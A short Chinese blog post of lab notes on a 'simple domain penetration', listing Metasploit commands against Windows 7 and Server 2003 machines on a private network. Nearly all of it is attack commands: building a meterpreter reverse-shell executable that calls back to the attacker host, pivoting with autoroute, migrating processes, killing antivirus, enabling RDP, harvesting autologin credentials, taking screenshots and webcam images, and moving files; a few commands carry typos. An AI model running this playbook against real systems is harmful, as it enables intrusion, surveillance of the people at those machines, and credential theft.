一次简单的域渗透

攻击机:kali  192.168.44.131

军事区:window7 192.168.44.139   192.168.4.

非军事区: window server 2003  192.168.4.

kali:

返回的连接可以使用background 将当前连接切换到后台运行;

 

3、切换到后台的会话可以使用session -i查看到,然后使用session -i id 将后台的会话切换回前台;

 

4、切换到后台的会话可以使用session -i查看到,还可以使用session -k id 将后台指定会话中断;

 

msfvenom -l windows/x64/meterpreter/reverse_tcp -lhost=192.168.44.131 -lport=4444 -f exe -o shy.exe

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.44.131

set lport 4444

expliot

 

ipconfig发现另一网段

run autoroute -s 192.168.4.20/24 添加路由

run autoroute -p 查看路由是否添加成功

getpid 查看自己的meterpreter shell 进程号

ps 查看目标机正在运行的进程

migrate pid 将自己的shell进程移动到一个稳定的进程当中。比如Explore.exe.

getpid 发现自己shell的进程号已经改变,说明已经成功迁移到稳定的进程当中。

或者 使用自动迁移命令(run post/windows/manage/migrate)自己寻找合适的进程进行迁移

 run post/windows/manage/migrate 

run post/windows/gather/checkvm 

idletime

route

run post/windows/manage/killav

run post/windows/manage/enable_rdp

run post/windows/gather/enum_logged_on_users 

run post/windows/gather/enum_applications

run windows/gather/credentials/windows_autologin

load espia

screengrab screenshot

webcam_list  

webcam_snap

webcam_stream

shell exit

文件系统命令

pwd

getlwd

search -f 123.txt -d c:

download c:/123.txt /root

upload /root/123.txt c:

 

 

 

 

 

 

 

 

 

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值